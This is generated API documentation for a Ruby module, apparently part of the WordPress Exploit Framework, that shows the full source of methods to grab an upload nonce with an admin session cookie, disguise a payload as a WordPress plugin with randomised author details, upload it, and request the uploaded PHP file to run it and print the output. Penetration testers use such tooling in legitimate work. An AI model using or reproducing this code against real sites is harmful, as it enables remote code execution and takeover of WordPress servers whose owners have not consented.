Module: Wpxf::WordPress::Plugin

Included in:

Xss

Defined in:

lib/wpxf/wordpress/plugin.rb

Overview

Provides functionality required to interact with the plugin system.

Instance Method Summary

• #fetch_plugin_upload_nonce(cookie) ⇒ String^?

  Retrieve a valid nonce to use for plugin uploads.

• #generate_wordpress_plugin_header(plugin_name) ⇒ String

  Generate a valid WordPress plugin header / base file.

• #upload_payload_as_plugin(name, payload_name, cookie) ⇒ Boolean

  Create and upload a plugin that encapsulates the current payload.

• #upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie) ⇒ HttpResponse^?

  Upload and execute a payload as a plugin.

Instance Method Details

#fetch_plugin_upload_nonce(cookie) ⇒ String^?

Retrieve a valid nonce to use for plugin uploads.

Parameters:

• cookie (String) —

  a valid admin session cookie.

Returns:

• (String, nil) —

  the nonce, nil on error.

# File 'lib/wpxf/wordpress/plugin.rb', line 8

def fetch_plugin_upload_nonce(cookie)
  res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
  return nil unless res&.code == 200
  res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
end

#generate_wordpress_plugin_header(plugin_name) ⇒ String

Generate a valid WordPress plugin header / base file.

Parameters:

• plugin_name (String) —

  the name of the plugin.

Returns:

• (String) —

  a PHP script with the appropriate meta data.

# File 'lib/wpxf/wordpress/plugin.rb', line 50

def generate_wordpress_plugin_header(plugin_name)
  ['<?php',
   '/**',
   "* Plugin Name: #{plugin_name}",
   "* Version: #{_generate_wordpress_plugin_version}",
   "* Author: #{Wpxf::Utility::Text.rand_alpha(10)}",
   "* Author URI: http://#{Wpxf::Utility::Text.rand_alpha(10)}.com",
   '* License: GPL2',
   '*/',
   '?>'].join("\n")
end

#upload_payload_as_plugin(name, payload_name, cookie) ⇒ Boolean

Create and upload a plugin that encapsulates the current payload.

Parameters:

• name (String) —

  the name of the plugin.

• payload_name (String) —

  the name the payload should use on the server.

• cookie (String) —

  a valid admin session cookie.

Returns:

• (Boolean) —

  true on success, false on error.

# File 'lib/wpxf/wordpress/plugin.rb', line 19

def upload_payload_as_plugin(name, payload_name, cookie)
  nonce = fetch_plugin_upload_nonce(cookie)
  return false if nonce.nil?

  res = _upload_plugin(name, payload_name, cookie, nonce)
  res&.code == 200
end

#upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie) ⇒ HttpResponse^?

Upload and execute a payload as a plugin.

Parameters:

• plugin_name (String) —

  the name of the plugin.

• payload_name (String) —

  the name the payload should use on the server.

• cookie (String) —

  a valid admin session cookie.

Returns:

• (HttpResponse, nil) —

  the Net::HttpResponse of the request.

# File 'lib/wpxf/wordpress/plugin.rb', line 32

def upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
  unless upload_payload_as_plugin(plugin_name, payload_name, cookie)
    emit_error 'Failed to upload the payload'
    return nil
  end

  payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
  emit_info "Executing the payload at #{payload_url}..."
  res = execute_get_request(url: payload_url)

  has_body = res&.code == 200 && !res.body.strip.empty?
  emit_success "Result: #{res.body}" if has_body
  res
end